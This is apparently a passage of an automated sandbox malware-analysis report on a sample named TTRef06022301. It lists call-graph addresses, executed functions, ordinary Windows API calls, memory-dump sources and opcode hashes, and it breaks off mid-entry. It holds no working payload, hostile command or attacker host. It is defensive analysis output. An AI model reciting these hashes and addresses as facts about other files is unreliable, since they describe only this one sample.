abb9d0 4 API calls 17043->17046 17044->17043 17045->17043 17046->17042 17058 27c8eb7 17047->17058 17048 27c8e6e 17048->17036 17062 27cfa48 17050->17062 17051 27cf95f 17051->17036 17054 abb9d4 17053->17054 17055 abba25 17054->17055 17067 abbf89 17054->17067 17072 abbf98 17054->17072 17055->17035 17060 ab9da0 2 API calls 17058->17060 17061 ab9db0 2 API calls 17058->17061 17059 27c8ed7 17059->17048 17060->17059 17061->17059 17063 27cfa57 17062->17063 17064 27cfa6a 17062->17064 17065 ab9da0 2 API calls 17063->17065 17066 ab9db0 2 API calls 17063->17066 17064->17051 17065->17064 17066->17064 17068 abbf92 17067->17068 17071 abbef5 17067->17071 17069 abbfdf 17068->17069 17076 abbd7c 17068->17076 17069->17055 17071->17055 17073 abbf9a 17072->17073 17074 abbfdf 17073->17074 17075 abbd7c 4 API calls 17073->17075 17074->17055 17075->17074 17077 abbd81 17076->17077 17079 abc8d0 17077->17079 17080 abbe64 17077->17080 17079->17079 17081 abbe6f 17080->17081 17082 ab6e34 4 API calls 17081->17082 17083 abc93f 17082->17083 17087 abe6c0 17083->17087 17095 abe6d8 17083->17095 17084 abc978 17084->17079 17088 abe6cc 17087->17088 17090 abe715 17088->17090 17103 abeb48 17088->17103 17107 abeb58 17088->17107 17089 abe755 17111 abf50f 17089->17111 17115 abf520 17089->17115 17090->17084 17096 abe6da 17095->17096 17097 abe715 17096->17097 17101 abeb48 2 API calls 17096->17101 17102 abeb58 2 API calls 17096->17102 17097->17084 17098 abe755 17099 abf50f CreateWindowExW 17098->17099 17100 abf520 CreateWindowExW 17098->17100 17099->17097 17100->17097 17101->17098 17102->17098 17104 abeb54 17103->17104 17105 ab9db0 2 API calls 17104->17105 17106 abeb61 17105->17106 17106->17089 17108 abeb5a 17107->17108 17109 ab9db0 2 API calls 17108->17109 17110 abeb61 17109->17110 17110->17089 17112 abf520 17111->17112 17113 abf5f1 17112->17113 17119 27c07a8 17112->17119 17116 abf54a 17115->17116 17117 abf5f1 17116->17117 17118 27c07a8 CreateWindowExW 17116->17118 17118->17117 17120 27c010c CreateWindowExW 17119->17120 17121 27c07dd 17120->17121 17121->17113 17123 27c60c3 17122->17123 17124 27c9082 17123->17124 17125 ab7810 4 API calls 17123->17125 17126 ab6e34 4 API calls 17123->17126 17124->17022 17125->17124 17126->17124 17127 abc0b0 17128 abc0b2 GetCurrentProcess 17127->17128 17129 abc12a GetCurrentThread 17128->17129 17130 abc123 17128->17130 17131 abc160 17129->17131 17132 abc167 GetCurrentProcess 17129->17132 17130->17129 17131->17132 17135 abc19d 17132->17135 17133 abc1c5 GetCurrentThreadId 17134 abc1f6 17133->17134 17135->17133 17136 ab40d0 17137 ab40e2 17136->17137 17138 ab40ee 17137->17138 17142 ab41e0 17137->17142 17147 ab3c64 17138->17147 17140 ab410d 17143 ab41e4 17142->17143 17151 ab42d1 17143->17151 17155 ab42e0 17143->17155 17148 ab3c6f 17147->17148 17163 ab5b24 17148->17163 17150 ab704c 17150->17140 17153 ab42d4 17151->17153 17152 ab43e4 17152->17152 17153->17152 17159 ab3de8 17153->17159 17157 ab4307 17155->17157 17156 ab43e4 17156->17156 17157->17156 17158 ab3de8 CreateActCtxA 17157->17158 17158->17156 17160 ab5370 CreateActCtxA 17159->17160 17162 ab5433 17160->17162 17164 ab5b2f 17163->17164 17167 ab5b54 17164->17167 17166 ab71c5 17166->17150 17168 ab5b5f 17167->17168 17171 ab6e04 17168->17171 17170 ab72a2 17170->17166 17172 ab6e0f 17171->17172 17173 ab6e34 4 API calls 17172->17173 17174 ab73a2 17173->17174 17174->17170 16891 27c09b0 16892 27c09d6 16891->16892 16895 27c0134 16892->16895 16896 27c013f 16895->16896 16897 27c1709 16896->16897 16899 27c16f9 16896->16899 16912 27c025c 16897->16912 16902 27c1830 16899->16902 16900 27c1707 16903 27c1844 16902->16903 16905 27c185e 16902->16905 16909 27c184b 16903->16909 16938 27c02bc 16903->16938 16905->16909 16922 27c029c 16905->16922 16907 27c18d0 16907->16900 16908 27c187b 16908->16909 16930 27c02ac 16908->16930 16919 27c18e8 16909->16919 16913 27c0261 16912->16913 16914 27c2e9c 16913->16914 16915 27c2df2 16913->16915 16916 27c0134 3 API calls 16914->16916 16917 27c2e4a CallWindowProcW 16915->16917 16918 27c2df9 16915->16918 16916->16918 16917->16918 16918->16900 16920 27c18f9 16919->16920 16946 27c2d8f 16919->16946 16920->16907 16923 27c0261 16922->16923 16924 27c0271 16923->16924 16925 27c2e9c 16923->16925 16926 27c2df2 16923->16926 16927 27c0134 3 API calls 16925->16927 16928 27c2e4a CallWindowProcW 16926->16928 16929 27c2df9 16926->16929 16927->16929 16928->16929 16929->16908 16931 27c0261 16930->16931 16932 27c0271 16931->16932 16933 27c2e9c 16931->16933 16934 27c2df2 16931->16934 16935 27c0134 3 API calls 16933->16935 16936 27c2e4a CallWindowProcW 16934->16936 16937 27c2df9 16934->16937 16935->16937 16936->16937 16937->16909 16939 27c02c7 16938->16939 16940 27c0271 16939->16940 16941 27c2e9c 16939->16941 16942 27c2df2 16939->16942 16943 27c0134 3 API calls 16941->16943 16944 27c2e4a CallWindowProcW 16942->16944 16945 27c2df9 16942->16945 16943->16945 16944->16945 16945->16909 16947 27c025c 4 API calls 16946->16947 16948 27c2d9a 16947->16948 16948->16920 17175 27c0a40 SetWindowLongW 17176 27c0aac 17175->17176

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00ABFB80 Relevance: .3, Instructions: 256COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3c0be7a73081b39babb44010bf7c5f8794cc3a872dc4839fb2215593baf3d68b
                                                                                                                                      • Instruction ID: 9aa5520429fc24c3249df43183024d958452dd50bffc320f72da66b918f29f79
                                                                                                                                      • Opcode Fuzzy Hash: 3c0be7a73081b39babb44010bf7c5f8794cc3a872dc4839fb2215593baf3d68b
                                                                                                                                      • Instruction Fuzzy Hash: 24914B70B006058FCB44EF79C8A05AABBF6BF883007148979D40ADB756EB34ED15CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 027C015C Relevance: .2, Instructions: 233COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.273637048.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27c0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 16ae8662467200aa347614f74482cff28fc9c9dd4582b0d13308608f8838e60f
                                                                                                                                      • Instruction ID: 16d09ecdf3464667f64e50c7d91a33860eae4b2dafbb25be4828e02da764efa3
                                                                                                                                      • Opcode Fuzzy Hash: 16ae8662467200aa347614f74482cff28fc9c9dd4582b0d13308608f8838e60f
                                                                                                                                      • Instruction Fuzzy Hash: 18918035E0031ACFCB04DBF4C8549DEBBBAFF89300F258619E405AB2A5DB70A945CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00ABC0A1 Relevance: 6.1, APIs: 4, Instructions: 125threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00ABC110
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 00ABC14D
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00ABC18A
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00ABC1E3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                      • Opcode ID: 46f28a8febd5977a41874ae2715a71ee7ed63563dd636101eabe4dab5b5534b6
                                                                                                                                      • Instruction ID: e8cc92abf6d64aacab3bd8f208020924089281ff5da17ffa72afc2e0b233457a
                                                                                                                                      • Opcode Fuzzy Hash: 46f28a8febd5977a41874ae2715a71ee7ed63563dd636101eabe4dab5b5534b6
                                                                                                                                      • Instruction Fuzzy Hash: 045165B0D003498FDB10CFAADA48BDEBBF4EB88314F208559E409B7252D7745884CF66
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00ABC0B0 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00ABC110
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 00ABC14D
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00ABC18A
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00ABC1E3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                      • Opcode ID: eca440029dcc6320695c6ce3c261db71a94a32102f8cc781ac331a6e7a2c6d7b
                                                                                                                                      • Instruction ID: 875de24698ccb2ea0128882ca24be2a00d11392f7ae44f68db3f5675ab4858e3
                                                                                                                                      • Opcode Fuzzy Hash: eca440029dcc6320695c6ce3c261db71a94a32102f8cc781ac331a6e7a2c6d7b
                                                                                                                                      • Instruction Fuzzy Hash: 585143B0D007498FDB10CFAADA48BDEBBF4EB88314F208959E419B7251D7B45884CF66
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00AB9DB0 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 662 ab9db0-ab9dc5 call ab882c 666 ab9ddb-ab9ddf 662->666 667 ab9dc7 662->667 668 ab9df3-ab9e34 666->668 669 ab9de1-ab9deb 666->669 723 ab9dcd call aba028 667->723 724 ab9dcd call aba038 667->724 674 ab9e41-ab9e4f 668->674 675 ab9e36-ab9e3e 668->675 669->668 670 ab9dd3-ab9dd5 670->666 672 ab9f10-ab9f8a 670->672 711 ab9f8e 672->711 712 ab9f8c 672->712 677 ab9e73-ab9e75 674->677 678 ab9e51-ab9e56 674->678 675->674 681 ab9e78-ab9e7f 677->681 679 ab9e58-ab9e5f call ab9a3c 678->679 680 ab9e61 678->680 684 ab9e63-ab9e71 679->684 680->684 685 ab9e8c-ab9e93 681->685 686 ab9e81-ab9e89 681->686 684->681 688 ab9ea0-ab9ea9 call ab9a4c 685->688 689 ab9e95-ab9e9d 685->689 686->685 694 ab9eab-ab9eb3 688->694 695 ab9eb6-ab9ebb 688->695 689->688 694->695 696 ab9ed9-ab9edd 695->696 697 ab9ebd-ab9ec4 695->697 721 ab9ee0 call aba310 696->721 722 ab9ee0 call aba340 696->722 697->696 698 ab9ec6-ab9ed6 call ab9a5c call ab9a6c 697->698 698->696 701 ab9ee3-ab9ee6 703 ab9f09-ab9f0f 701->703 704 ab9ee8-ab9f06 701->704 704->703 714 ab9f92-ab9f99 711->714 715 ab9f90-ab9f91 711->715 712->711 713 ab9f9a-ab9fd0 712->713 716 ab9fd8-aba003 GetModuleHandleW 713->716 717 ab9fd2-ab9fd5 713->717 714->713 715->714 718 aba00c-aba020 716->718 719 aba005-aba00b 716->719 717->716 719->718 721->701 722->701 723->670 724->670
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00AB9FF6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                      • Opcode ID: 17a73f25163a480bc8c1d1150edea82790371009d60d5838b2281c43fdc92a9e
                                                                                                                                      • Instruction ID: b00f7ac20a6604cf20bb8b0008674e143c5008a888f2fc2947926845d19148d4
                                                                                                                                      • Opcode Fuzzy Hash: 17a73f25163a480bc8c1d1150edea82790371009d60d5838b2281c43fdc92a9e
                                                                                                                                      • Instruction Fuzzy Hash: FD712570A00B058FDB24DF2AD1517ABBBF9BF88310F00892DE54AD7A52DB75E845CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00AB5364 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 725 ab5364-ab5366 726 ab536a 725->726 727 ab5368 725->727 728 ab536e 726->728 729 ab536c 726->729 727->726 731 ab5372-ab5431 CreateActCtxA 728->731 732 ab5370-ab5371 728->732 729->728 730 ab52fe-ab5331 729->730 735 ab533a-ab535b 730->735 736 ab5333-ab5339 730->736 737 ab543a-ab5494 731->737 738 ab5433-ab5439 731->738 732->731 736->735 746 ab54a3-ab54a7 737->746 747 ab5496-ab5499 737->747 738->737 748 ab54a9-ab54b5 746->748 749 ab54b8 746->749 747->746 748->749 751 ab54b9 749->751 751->751
                                                                                                                                      APIs
                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 00AB5421
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: 72be74f085e5c58a4b2b2ac8d92b660660757a8d2b3f3fc4e25b6f5d8b21cee5
                                                                                                                                      • Instruction ID: 0d78b1ca48a6bdaeda92b18d82bcf21807a191cd19b065e0fa5aa23b53e9157a
                                                                                                                                      • Opcode Fuzzy Hash: 72be74f085e5c58a4b2b2ac8d92b660660757a8d2b3f3fc4e25b6f5d8b21cee5
                                                                                                                                      • Instruction Fuzzy Hash: 92512371C00A59CFDB20CFAAC9447DEBBF9BF58304F2480AAD418AB252D7B55985CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 027C010C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 752 27c010c-27c085e 754 27c0869-27c0870 752->754 755 27c0860-27c0866 752->755 756 27c087b-27c091a CreateWindowExW 754->756 757 27c0872-27c0878 754->757 755->754 759 27c091c-27c0922 756->759 760 27c0923-27c095b 756->760 757->756 759->760 764 27c095d-27c0960 760->764 765 27c0968 760->765 764->765
                                                                                                                                      APIs
                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 027C090A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.273637048.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27c0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                      • Opcode ID: db1878fc09bed450f367cb1c34d7cfc4f59c1e096d75f923f2680cb7a084b792
                                                                                                                                      • Instruction ID: 684cc82f1113d662c91231f1c5729b53303f7487ad5526e22b6eb112afdc9fd6
                                                                                                                                      • Opcode Fuzzy Hash: db1878fc09bed450f367cb1c34d7cfc4f59c1e096d75f923f2680cb7a084b792
                                                                                                                                      • Instruction Fuzzy Hash: B051B2B1D00309DFDB14CFAAC884ADEBBB5BF48314F24822EE419AB210D7749985CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 027C025C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 766 27c025c-27c2dec 770 27c2e9c-27c2ebc call 27c0134 766->770 771 27c2df2-27c2df7 766->771 778 27c2ebf-27c2ecc 770->778 773 27c2df9-27c2e30 771->773 774 27c2e4a-27c2e82 CallWindowProcW 771->774 781 27c2e39-27c2e48 773->781 782 27c2e32-27c2e38 773->782 775 27c2e8b-27c2e9a 774->775 776 27c2e84-27c2e8a 774->776 775->778 776->775 781->778 782->781
                                                                                                                                      APIs
                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 027C2E71
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.273637048.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27c0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                      • Opcode ID: 86f25dd0966bf268c325c21ce153007dab00e4924e39c125b127bce67b3b470c
                                                                                                                                      • Instruction ID: 3516c90a8d07ca3a1ef4e1bc766e79bfd1e409e719029fd9ad8e85e6b6e6ff61
                                                                                                                                      • Opcode Fuzzy Hash: 86f25dd0966bf268c325c21ce153007dab00e4924e39c125b127bce67b3b470c
                                                                                                                                      • Instruction Fuzzy Hash: 684107B4A00215DFCB14CF99C498AAAFBF5FB88314F25855DD919A7321D774A841CFA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00AB3DE8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 784 ab3de8-ab5431 CreateActCtxA 788 ab543a-ab5494 784->788 789 ab5433-ab5439 784->789 796 ab54a3-ab54a7 788->796 797 ab5496-ab5499 788->797 789->788 798 ab54a9-ab54b5 796->798 799 ab54b8 796->799 797->796 798->799 801 ab54b9 799->801 801->801
                                                                                                                                      APIs
                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 00AB5421
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: aa75e31d95ddbb3b4115e6daaac01d54abc5e88bd9be45d7929d11885fed2b96
                                                                                                                                      • Instruction ID: 4153c8055c5cce1698fef5cb16fc9a1924a6e8219ab5555c26b1e67abdc6d4fb
                                                                                                                                      • Opcode Fuzzy Hash: aa75e31d95ddbb3b4115e6daaac01d54abc5e88bd9be45d7929d11885fed2b96
                                                                                                                                      • Instruction Fuzzy Hash: AE4102B0C0065DCFDB24CFA9C944BCEBBBABF48304F608069D409AB251D7B56985CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00ABC2D1 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 802 abc2d1-abc2d6 803 abc2d8-abc36c DuplicateHandle 802->803 804 abc36e-abc374 803->804 805 abc375-abc392 803->805 804->805
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ABC35F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: ec47aa77a5a73d8fc399dc5ad012932073992fb5d823b3d28f952f97cb51b62e
                                                                                                                                      • Instruction ID: d4cb6a4dc4d260fc8a36a19d03f8bdf33548f0fc46dd21175d53e7356f8efe4d
                                                                                                                                      • Opcode Fuzzy Hash: ec47aa77a5a73d8fc399dc5ad012932073992fb5d823b3d28f952f97cb51b62e
                                                                                                                                      • Instruction Fuzzy Hash: 1D2107B5D002089FDB10CF9AD584ADEBFF8FB58320F14851AE915A7311C378A944CF61
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00ABC2D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 808 abc2d8-abc36c DuplicateHandle 809 abc36e-abc374 808->809 810 abc375-abc392 808->810 809->810
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ABC35F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: ffde3f1c955669af5512807ea23e57851f7912068baa1c14c117b9a7c6b8348c
                                                                                                                                      • Instruction ID: 82c058a451c800ac9567cbdd9d8ad8805eb37bfc5bbd3b5be874ba29421dbadf
                                                                                                                                      • Opcode Fuzzy Hash: ffde3f1c955669af5512807ea23e57851f7912068baa1c14c117b9a7c6b8348c
                                                                                                                                      • Instruction Fuzzy Hash: 0321E6B5D00208AFDB10CFAAD584ADEFBF8FB48320F14841AE914A7310D378A944CFA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00ABA210 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 813 aba210-aba212 814 aba216 813->814 815 aba214 813->815 816 aba21a-aba258 814->816 817 aba218-aba219 814->817 815->814 818 aba25a-aba25d 816->818 819 aba260-aba28f LoadLibraryExW 816->819 817->816 818->819 820 aba298-aba2b5 819->820 821 aba291-aba297 819->821 821->820
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00ABA071,00000800,00000000,00000000), ref: 00ABA282
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                      • Opcode ID: 290a39e8d33a2ec18301568eef3e9215f7e6484332e2d1d976cb038d2a61ed02
                                                                                                                                      • Instruction ID: c3acdaf7cf40cc0964fae8b94a90dd142e2cf5f605d11bc51cc16a7812f65ae7
                                                                                                                                      • Opcode Fuzzy Hash: 290a39e8d33a2ec18301568eef3e9215f7e6484332e2d1d976cb038d2a61ed02
                                                                                                                                      • Instruction Fuzzy Hash: CC1117B6D002099FCB14CF9AD844ADEFBF8EB68310F14852ED419A7611C379A945CFA5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00AB9A98 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 824 ab9a98-aba258 827 aba25a-aba25d 824->827 828 aba260-aba28f LoadLibraryExW 824->828 827->828 829 aba298-aba2b5 828->829 830 aba291-aba297 828->830 830->829
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00ABA071,00000800,00000000,00000000), ref: 00ABA282
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                      • Opcode ID: 2edd092bf4dc6bb0e32e23c389be7147bdec953735350452b0d9f53338a2b35d
                                                                                                                                      • Instruction ID: eafa4422f9aaac14dbd9972e9cd241bc05a7f50c62e81c0fb678294c44da6757
                                                                                                                                      • Opcode Fuzzy Hash: 2edd092bf4dc6bb0e32e23c389be7147bdec953735350452b0d9f53338a2b35d
                                                                                                                                      • Instruction Fuzzy Hash: 6C1126B6D003099FCB10CF9AC444ADEFBF8EB68310F14852EE419A7211C379A945CFA5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00AB9F90 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 833 ab9f90-ab9fd0 836 ab9fd8-aba003 GetModuleHandleW 833->836 837 ab9fd2-ab9fd5 833->837 838 aba00c-aba020 836->838 839 aba005-aba00b 836->839 837->836 839->838
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00AB9FF6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                      • Opcode ID: 497dc723266a773d532bed4268290da2b1fcb7d3e49398b92652a44d5f181a76
                                                                                                                                      • Instruction ID: beafe35435aef583317ac2fd4c8156239c0447732edf77d8c9bf59b0fd47d219
                                                                                                                                      • Opcode Fuzzy Hash: 497dc723266a773d532bed4268290da2b1fcb7d3e49398b92652a44d5f181a76
                                                                                                                                      • Instruction Fuzzy Hash: 1211D2B5D006498FCB20DF9AD444BDEFBF8AB88324F14851AD429B7601C375A545CFA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 027C0A40 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

